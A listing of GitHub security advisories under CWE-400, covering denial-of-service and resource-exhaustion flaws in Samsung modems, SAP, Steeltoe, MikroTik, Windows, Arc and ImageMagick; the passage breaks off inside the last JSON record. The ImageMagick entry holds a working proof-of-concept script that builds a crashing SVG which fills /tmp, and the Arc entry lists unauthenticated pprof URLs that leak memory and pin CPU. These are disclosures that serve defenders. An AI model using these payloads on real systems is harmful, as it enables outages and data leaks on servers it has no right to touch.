CWE-400
DiscouragedUncontrolled Resource Consumption
Abstraction: Class · Status: Draft
The product does not properly control the allocation and maintenance of a limited resource.
5412 vulnerabilities reference this CWE, most recent first.
GHSA-J8JP-C763-RC6R
Vulnerability from github – Published: 2026-04-06 21:31 – Updated: 2026-04-07 15:30An issue was discovered in NAS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads to a Denial of Service.
{
"affected": [],
"aliases": [
"CVE-2025-54324"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-06T19:16:26Z",
"severity": "HIGH"
},
"details": "An issue was discovered in NAS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads to a Denial of Service.",
"id": "GHSA-j8jp-c763-rc6r",
"modified": "2026-04-07T15:30:46Z",
"published": "2026-04-06T21:31:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54324"
},
{
"type": "WEB",
"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates"
},
{
"type": "WEB",
"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54324"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-J8M5-M975-227F
Vulnerability from github – Published: 2022-05-24 19:02 – Updated: 2022-06-29 00:00The Integration Builder Framework of SAP Process Integration versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently validate an XML document uploaded from local source. An attacker can craft a malicious XML which when uploaded and parsed by the application, could lead to Denial-of-service conditions due to consumption of a large amount of system memory, thus highly impacting system availability.
{
"affected": [],
"aliases": [
"CVE-2021-27617"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-05-11T15:15:00Z",
"severity": "MODERATE"
},
"details": "The Integration Builder Framework of SAP Process Integration versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently validate an XML document uploaded from local source. An attacker can craft a malicious XML which when uploaded and parsed by the application, could lead to Denial-of-service conditions due to consumption of a large amount of system memory, thus highly impacting system availability.",
"id": "GHSA-j8m5-m975-227f",
"modified": "2022-06-29T00:00:49Z",
"published": "2022-05-24T19:02:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27617"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/3012021"
},
{
"type": "WEB",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=576094655"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-J8PH-6FXJ-G533
Vulnerability from github – Published: 2026-07-02 20:30 – Updated: 2026-07-02 20:30Summary
DataCenterInfo.FromJson throws ArgumentException for any name value other than "MyOwn" or "Amazon", despite the Java Eureka specification defining a third valid value: "Netflix". The exception propagates through the entire registry deserialization chain and is swallowed by the periodic cache refresh task, leaving the local service registry permanently empty or stale.
Impact
Any registration with an unrecognized DataCenterInfo.name permanently disables service discovery for every Steeltoe Eureka client connected to the same registry. New clients start with an empty registry and running clients stop refreshing. The outage persists until the triggering registration is removed.
Because "Netflix" is valid in the Java Eureka specification, a Java or Spring service in the same mesh can trigger this unintentionally.
Affected configuration
- Application uses the Steeltoe Eureka client (
EurekaDiscoveryClient). - The registry contains at least one registration with a
DataCenterInfo.namevalue other than"MyOwn"or"Amazon".
Mitigations
If an immediate upgrade is not possible, remove any registrations using unsupported DataCenterInfo.name values from the registry. In mixed Java/Spring and Steeltoe environments, audit for the Netflix data center type before deploying Steeltoe Eureka clients.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Steeltoe.Discovery.Eureka"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.2.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Steeltoe.Discovery.Eureka"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-50196"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-02T20:30:03Z",
"nvd_published_at": "2026-06-17T22:16:24Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`DataCenterInfo.FromJson` throws `ArgumentException` for any `name` value other than `\"MyOwn\"` or `\"Amazon\"`, despite the Java Eureka specification defining a third valid value: `\"Netflix\"`. The exception propagates through the entire registry deserialization chain and is swallowed by the periodic cache refresh task, leaving the local service registry permanently empty or stale.\n\n### Impact\n\nAny registration with an unrecognized `DataCenterInfo.name` permanently disables service discovery for every Steeltoe Eureka client connected to the same registry. New clients start with an empty registry and running clients stop refreshing. The outage persists until the triggering registration is removed.\n\nBecause `\"Netflix\"` is valid in the Java Eureka specification, a Java or Spring service in the same mesh can trigger this unintentionally.\n\n### Affected configuration\n\n- Application uses the Steeltoe Eureka client (`EurekaDiscoveryClient`).\n- The registry contains at least one registration with a `DataCenterInfo.name` value other than `\"MyOwn\"` or `\"Amazon\"`.\n\n### Mitigations\n\nIf an immediate upgrade is not possible, remove any registrations using unsupported `DataCenterInfo.name` values from the registry. In mixed Java/Spring and Steeltoe environments, audit for the `Netflix` data center type before deploying Steeltoe Eureka clients.",
"id": "GHSA-j8ph-6fxj-g533",
"modified": "2026-07-02T20:30:03Z",
"published": "2026-07-02T20:30:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/SteeltoeOSS/security-advisories/security/advisories/GHSA-j8ph-6fxj-g533"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50196"
},
{
"type": "WEB",
"url": "https://github.com/SteeltoeOSS/Steeltoe/commit/b8ed8557bb595863e4f340051d16b26ba40a75f4"
},
{
"type": "WEB",
"url": "https://github.com/SteeltoeOSS/Steeltoe/commit/c34a7399e808d0d11dd977460e81df1f2722df28"
},
{
"type": "PACKAGE",
"url": "https://github.com/SteeltoeOSS/Steeltoe"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Steeltoe.Discovery.Eureka: Unrecognized DataCenterInfo.Name poisons entire registry fetch"
}
GHSA-J8R5-239V-8HJW
Vulnerability from github – Published: 2022-05-14 03:22 – Updated: 2022-05-14 03:22A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending a crafted FTP request on port 21 that begins with many '\0' characters, preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
{
"affected": [],
"aliases": [
"CVE-2018-10070"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-04-16T21:29:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending a crafted FTP request on port 21 that begins with many \u0027\\0\u0027 characters, preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a \"router was rebooted without proper shutdown\" message.",
"id": "GHSA-j8r5-239v-8hjw",
"modified": "2022-05-14T03:22:02Z",
"published": "2022-05-14T03:22:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10070"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/44450"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/147183/MikroTik-6.41.4-Denial-Of-Service.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-J8WG-8FGF-X8C5
Vulnerability from github – Published: 2024-07-09 18:30 – Updated: 2024-07-09 18:30Windows Line Printer Daemon Service Denial of Service Vulnerability
{
"affected": [],
"aliases": [
"CVE-2024-38027"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-09T17:15:29Z",
"severity": "MODERATE"
},
"details": "Windows Line Printer Daemon Service Denial of Service Vulnerability",
"id": "GHSA-j8wg-8fgf-x8c5",
"modified": "2024-07-09T18:30:51Z",
"published": "2024-07-09T18:30:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38027"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38027"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-J93G-RP6M-J32M
Vulnerability from github – Published: 2026-06-11 17:10 – Updated: 2026-06-11 17:10Summary
Arc registers Go's net/http/pprof handlers at /debug/pprof/* via app.Use(pprof.New()) in internal/api/server.go, and /debug/pprof is added to PublicPrefixes in cmd/arc/main.go. The auth middleware short-circuits before the token check on prefix match, so the endpoints are reachable without any authentication.
Impact
Any network-reachable caller (no token required) can:
- Fetch
/debug/pprof/heap— leaks in-memory state: live SQL strings, decoded msgpack records, decompressed request bodies, cached*TokenInfo(the auth cache keys on SHA-256 of the plaintext token atauth.go:543). - Fetch
/debug/pprof/goroutine?debug=2— leaks call stacks, identifying internal code paths. - Fetch
/debug/pprof/profile?seconds=N— pins a CPU core for arbitrary duration. Trivial DoS amplification (one short HTTP request → minutes of server CPU). - Fetch
/debug/pprof/trace— long-duration execution trace, similar DoS profile.
No authentication, no rate limiting, no resource bound on the seconds parameter.
Patches
https://github.com/Basekick-Labs/arc/releases/tag/v26.06.1
Planned mitigation:
- Gate pprof registration behind an env var (
ARC_DEBUG_PPROF=1) that defaults to off. - When enabled, bind pprof to a separate localhost-only listener (
127.0.0.1:6060via dedicatednet/httpserver) so it's never reachable from the public API port. - Remove
/debug/pproffromPublicPrefixes. - Fix the
HasPrefixbug where"/debug/pprofX"matches"/debug/pprof".
Workarounds
- Block
/debug/pprof*at a reverse proxy / load balancer in front of Arc. - Restrict Arc's API port to known-trusted networks via firewall rules.
- Patch the running build: comment out
app.Use(pprof.New())ininternal/api/server.goand rebuild.
Credits
Reported by Alex Manson (@NeuroWinter, https://neurowinter.com/) on 2026-05-19.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/basekick-labs/arc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260520170331-32a4091fb949"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48050"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-306",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-11T17:10:21Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nArc registers Go\u0027s `net/http/pprof` handlers at `/debug/pprof/*` via `app.Use(pprof.New())` in `internal/api/server.go`, and `/debug/pprof` is added to `PublicPrefixes` in `cmd/arc/main.go`. The auth middleware short-circuits before the token check on prefix match, so the endpoints are reachable without any authentication.\n\n### Impact\n\nAny network-reachable caller (no token required) can:\n\n- Fetch `/debug/pprof/heap` \u2014 leaks in-memory state: live SQL strings, decoded msgpack records, decompressed request bodies, cached `*TokenInfo` (the auth cache keys on SHA-256 of the plaintext token at `auth.go:543`).\n- Fetch `/debug/pprof/goroutine?debug=2` \u2014 leaks call stacks, identifying internal code paths.\n- Fetch `/debug/pprof/profile?seconds=N` \u2014 pins a CPU core for arbitrary duration. Trivial DoS amplification (one short HTTP request \u2192 minutes of server CPU).\n- Fetch `/debug/pprof/trace` \u2014 long-duration execution trace, similar DoS profile.\n\nNo authentication, no rate limiting, no resource bound on the `seconds` parameter.\n\n### Patches\n\nhttps://github.com/Basekick-Labs/arc/releases/tag/v26.06.1\n\nPlanned mitigation:\n\n1. Gate pprof registration behind an env var (`ARC_DEBUG_PPROF=1`) that defaults to off.\n2. When enabled, bind pprof to a separate localhost-only listener (`127.0.0.1:6060` via dedicated `net/http` server) so it\u0027s never reachable from the public API port.\n3. Remove `/debug/pprof` from `PublicPrefixes`.\n4. Fix the `HasPrefix` bug where `\"/debug/pprofX\"` matches `\"/debug/pprof\"`.\n\n### Workarounds\n\n- Block `/debug/pprof*` at a reverse proxy / load balancer in front of Arc.\n- Restrict Arc\u0027s API port to known-trusted networks via firewall rules.\n- Patch the running build: comment out `app.Use(pprof.New())` in `internal/api/server.go` and rebuild.\n\n### Credits\n\nReported by Alex Manson ([@NeuroWinter](https://github.com/NeuroWinter), https://neurowinter.com/) on 2026-05-19.",
"id": "GHSA-j93g-rp6m-j32m",
"modified": "2026-06-11T17:10:21Z",
"published": "2026-06-11T17:10:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Basekick-Labs/arc/security/advisories/GHSA-j93g-rp6m-j32m"
},
{
"type": "WEB",
"url": "https://github.com/Basekick-Labs/arc/commit/32a4091fb949f9cf060cdd804a07f6450dc426a8"
},
{
"type": "PACKAGE",
"url": "https://github.com/Basekick-Labs/arc"
},
{
"type": "WEB",
"url": "https://github.com/Basekick-Labs/arc/releases/tag/v26.06.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Arc: Unauthenticated access to Go debug pprof endpoints leaks runtime state and enables CPU-burn DoS"
}
GHSA-J96M-MJP6-99XR
Vulnerability from github – Published: 2026-03-12 20:30 – Updated: 2026-03-12 20:30Summary
Specially crafted SVG file make segmentation fault and generate trash files in "/tmp", possible to leverage DoS.
Operating system, version and so on
Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara)
Tested ImageMagick version
6.9.11-60, 7.1.0-62
Details
A specially created SVG file that loads by itself and make segmentation fault. Remote attackers can take advantage of this vulnerability to cause a denial of service of the generated SVG file.
It seems that this error affects a lot of websites and causes a generating trash files in /tmp when uploading this PC file to the server.
I think it's better to check the file descriptor coming from itself before executing read().
PoC
- Generate SVG file: ```
2. Run some commands for verification:
```$rm -f /tmp/*
$./magick --version
Version: ImageMagick 7.1.0-62 Q16-HDRI x86_64 74b3683a4:20230211 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
$./magick convert -verbose -font OpenSymbol bad.svg t.jpg
'inkscape' '/tmp/magick-ixX13JwrwrLUhyucKsGxechsQtEN4Zji' --export-filename='/tmp/magick-qp154V6U-dyAwtU-QbcnWD8XKFcG7q5k.png' --export-dpi='96' --export-background='rgb(100%,100%,100%)' --export-background-opacity='1' > '/tmp/magick-YWdlPJt-_9BfRq0uY2vmza_VOxWfjyvl' 2>&1
Segmentation fault
$ls /tmp
magick-1iZstE-dzlzQTN4HkWX_JlakXXtH4IEM magick-GeFwj8Be_wISDLJnsr4s5WC7p079pzXN magick-s7QN2tTaiXEr9KmkbkHdmtfmgrnjFRaM
magick-1LG0ND-RZMQOG8xizDHd-qdd6_Fu70YP magick-ggORXwnSivWesH2gthhafuLTVw7TLqwP magick-s835rBXZIGK5bkp3ijKoMTCbcyWza3ON
magick-25byX_oEeEr2dWIkr9nyEoVz1MHC2n9M magick-GrRg60fY1LOv4uUhqD16AaEcL6rWtNeN magick-siS7QS_av31X63ENYmecytIjx1iKmWAN
magick-2Dj7LuLUHF6Y93mZ9ZT8a5taf7b5Hb9O magick-gTQUBafZIaI1n8q-QXOwOvyc6qv3tolN magick-SIXvVjWVvDhX1w5NL9K6owJtO0CgG3NN
magick-2GrJuPlQjwGwsTK8I1aTMxg90h8PeK4M magick-hik3AU_2x0D_R8ViIBXUIuRljCXSmgqO magick-sJhO2Yv_aeKsxt1JxDENKIiQqkOkSfwM
magick-2QIFnR9e-fYRFevd1-vQ-bSk0I1VOAsO magick-HJ18uyG3HLvEftNcMqCEJ5LKwi12CQgO magick-SNgGdhyKjp5TZZQmWqioLEcyQ8vMzG3O
magick-2rEueYW0PIXGxE1zHm3LsGedMW2KLdgP magick-hUaNDJgYfzTzJes4QlnLwaYh2fcaOWgQ magick-SxLBCSdKVHSQOrjohe4WFyLHaPOyDUiP
magick-2uRqbAjqkXXMMGQHpw8WG18lnDHaRd3N magick-_HWqrSdj_ihWMzjJ_eRiAkKbgrIljhUM magick-t02HQvZSsYLzmJesC2Mpjp5OL3zN4A5P
magick-3dPT4h0HzM6ZqCwpGEB69e27pZhHbfHP magick-iEMFbMc2VvGj067miVskUC-mxOveGpqO magick-T4kTJGu-6wF60OOIHOB5tKO63NW5qTTL
magick-3SVSiI4Yg_eQ01ZZV8lZsBM_MhauuwpO magick-InCjmKQ7uSGizlJFOZz9Vo3Ax1yvLy5L magick-TGIY7l3-dNVdAbGaMIbN0z3YGy5mrNvM
magick-3WQIQghdu9-YHVasNASfkkU63yyVdmfO magick-IPu9YWX3Lk96EkP63KLqQ-CX6020cZMN magick-Thg6M-CqdcXc0SyjRdYm19rtVBLt2U6P
magick-4hLf4JPIes67QpGP7GfmOPftGvENC1aN magick-IVKuPYBpBe6Lx9F3lLMAMCjIptMoz0ZM magick-TiTtPZdT3Zgsd-pasyRFTb-DbLGNqJTO
magick-4tTMAJrCHh2E8M1xw5BIjx8UDyb42FWM magick-IVzovwQiOR2fwJDO5E5RZb58apCPBX8M magick-_TQZIwyyLufZWMVx1-k3YLSYSsGl6upM
magick-4xs5mqt95PYGrXXxZiwyYHFKREC0NEWL magick-J36psEABfkKfgVQdeFsptbkRWT0b1uNP magick-tzMg0NWi-_GQOzES2aPMPRqCk-bgjyVN
magick-5DmloHI-m-WPROyfQmm5cF8GOEVa5EqO magick-jEq-Q6t6D3CU-eevjhgfjU_LPP3pOEoO magick-ULNarZD53mUqpJrHZVeZw5x0cuUH683N
magick-5JvQUY2vVq_kpzhfUTcsxao_YB2WImZN magick-jNiokVz_0Iifz5QX3a9AUIUOBoxfJ49P magick-uLR13qPG6X-c3avLRypLJ-C7-UiUH9tM
magick-5NoXNg55Xyh8816ksKEcqreuN1BF93LO magick-jwa4IVvrxrE4OTSA0m8iB2W3K5LiinmQ magick-uW9khwJZfM4EH1cETVDv09QnueONQGPP
magick-60BRKi88--TOk-Sp8t5nAyAxjSuOpxfO magick-K5mhLUCkx0WJxcWr7G7oT0nNrc5qBvgQ magick-v4l3nLHBXBjCNc-nTHSTwUOEfsNCUMnP
magick-6t2qB_JnplYLZZo5thj6PV0R15LrPe4L magick-K5qzx3k8-36H5wfEgl3Jy1oNpOyscHhN magick-v7Xm_e5JIf4lCC_CwXJkIuQNHEE7D1LM
magick-6_UmuyWO8OviaajA92_VeD1bK8z0btAO magick-K6-l4o2PkC4V7Nq_IJ9y-ifJLl6lSzdM magick-vd7xpM8OrXvu3Oftqd7xdRmGDdoGcHrP
magick-725dkkTfpkfKmogI4WLWWwCbrxc0aysP magick-KchLIwf4-ahsUq1FsJfK58j3Jb6CAMTP magick-VhfNmWGF-AOhytm1DMGG8n1DLOAG3p1N
magick-7rZG_PFyH2Q7ibxFrB4kTQZjkihhU9uO magick-kpcUuOTI4UlrK8kHoZh38ziLMmBjtjvO magick-vHp_Pz6BixbqmYCq_D2zs2sU4hFRbQoP
magick--7T1tmKSEJSSPJIgeDEQ9PLdo8oPh60P magick-kReWGvubeCrLdw4RcRsJdJhlV43wCffM magick-VLoWnTJppgO7-ivh0q_uuGcgPDkuyKPN
magick-8jBguKQr6qeZTsw4eFbQWO34ndlsBpbO magick-LBjQNSTFFpLRnj3Cldvjm5e_PWYL1fLL magick-Vp_vOIJK-XsFRZeAS1ZJ9Ra2vkgJbCOL
magick-9Hno6LBapbL0jw_CSEC7Ua6A7kB3uYiN magick-Lfu-5C1697AwNxTZnljfR24E2_7ZDnwP magick-VpzT9KMjKbomi6mV3ZnnRkoq1WAP41vM
magick-9SN2401usIEYCc6zcn442pdvqyVdPWaQ magick-lHxUfKDHYSfpVi7yOc31u7gJVTXLhSuN magick-vRG2_rcf6I8lB2MJF6DqHqh2_z21IP5N
magick-a1uVHLsbEnA8yXKvwmW3PWAFBdnfoSnQ magick-M4mcsykxHPNkFTDgc4tdJ9kP1Trkm64M magick-vw2VNrClFVhnXLqVoIz35Xpo232qsngN
magick-AbpJUZcspor3bkYr70l17bGSjntyAhZP magick-m5P0dZWaFUeZo4kr8HcO6vpfuICmmBcM magick-WEYdL0amRHxeCpuGiFEuulRwwzkjZyXO
magick-Acsy_QEmT-x7nE6DvfIv2pqjLbfJYTtN magick-MHI0zAFGR1-ljbFLl12i5hFVpkoBbdpN magick-WKjEe_jTF4V6Jt_kCbFEy2B6kQcyFseQ
magick-Ai76_QfTBT0DXjGqvZ_aAGia_gvAxuGM magick-mOckd_uEYCLc9gy1XwVgtJWpr1aDU7QP magick-WkkwqgsnNNSleWlRm-1BN8RiE-QcF9lO
magick-albf_l7tU2ASh6PRhnMWBDscz31fS1BO magick-MrajCpsti_3MlAWlNviDCY3iUeZsgGLM magick-WMlxV7rdjtMYe1F0aggQZW2WNpvhY2GO
magick-A-nsLcvOOBlHzdBGQMSsdTrvsfUevEQO magick-mZyca0hC8atGLvY-m0UYec1yCU3rGIWM magick-wnqAodNT7ZVbe8dIN-Gd2pxCNo6cwzOL
magick-AplCAOC7_K6cDM3qO3wqSONMhVuztohO magick-NAH0CgD3XCLMS1VN_-4yju-2RCdFJbGO magick-wP3Q3aM05wB2K6NBolzm6sC_R3b5wE1P
magick-ApNw8tmuaXUw-mqdMF7P0ZKOV3YHwQGM magick-NU3oGX5NxUhJvWQ_WWY8-7BNAnHWJceM magick-wsCa-R-K6HYtZ7FWWnPg3FpOyGmS1wuO
magick-AWye85xaEc_t6rGB9bIvIz9BBhrRyg3O magick-NZBKgJGx7bH8uZ2PiKF8jtzCI9aBDVZN magick-WvNjMMQ2gXHSGNWCMceMqBL8ksnGZIuO
magick-aXtmFaHIdz24xjFvCy4ZQda2wef0AH0N magick-o3FerPGSptnb0U5mHu6DH-00ZTlTlDCO magick-xAPfisi5E9NHJKbkrbCGioXCkTs3uDYM
magick-B5uiXH3Mrf0GgmF9NAPwqSJd-lMFLfrM magick-o4Dl5iYn3veI54-lNtHgm6wnAIQ79urP magick-Xb2irJZuxzYWsCfmYHc8oaKU67ANR27N
magick-BEr6_VZecWKFCRVuSXPEIbJu6uuBe0pO magick-o9S5taGlSrED8zUEtv0EkpjoWk61fJBO magick-Xkes-Q_QqXhMthGwFKxLjpRvL96qRd6O
magick-bKCtVcSkQqtXdjO8X_AyWeocMsYuZArN magick-OeHngPf0pRuDH9DpIs_OpkoAbDnAvBTL magick-xlhsal9kyY6QMOSb1WmyTx1vGTqE94bO
magick-Btw2-hfTAVQLiPRMXakrXs_UhstT2ZGM magick-OhD82cIFbY91zGxpIt52AbjWekddAU2L magick-xmmr39PvOExl0B8w0YO_oq2_yYyWoVLM
magick-By2_pnDUxk85bO3M7kkMbAEXHGShyc0O magick-OlcHbZjE_-66xMyWVlhfAucxYJioiQ4L magick-xq9qw9wK-TRFokBTostne36jQXljCa7M
...
Impact
Possible DOS, because when ImageMagick crashes it generates a lot of trash files. This trash file can be large, if SVG file contains many render action.
Additional impact
In DOS attack if remount attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. This means that if an attacker uploads a 100 M SVG, the server will generate about 10 G.
Example:
$cat dos_poc.py
open("bad_dos.svg", "w").write("""<?xml version="1.0"?>
<?xml-stylesheet href="https://example.com/style.xsl" type="text/xsl" ?>
<!DOCTYPE test>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<image height="200" width="200" href="bad_dos.svg"""" + "0"*(1024*1021) + """"" />
</svg>""")
$rm -rf /tmp/magick-*
$python3 dos_poc.py
$du -h bad_dos.svg
1,0M bad_dos.svg
$../magick convert -font OpenSymbol bad_dos.svg t.jpg
Segmentation fault
$cat /tmp/magick-* > dos_k.txt
$du -h dos_k.txt
103M dos_k.txt
P. S. If ImageMagick will work in Docker container this attack will crash server where docker running. Because the size of the docker container will increase.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-OpenMP-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-OpenMP-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-OpenMP-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-OpenMP-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-OpenMP-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.0"
},
"package": {
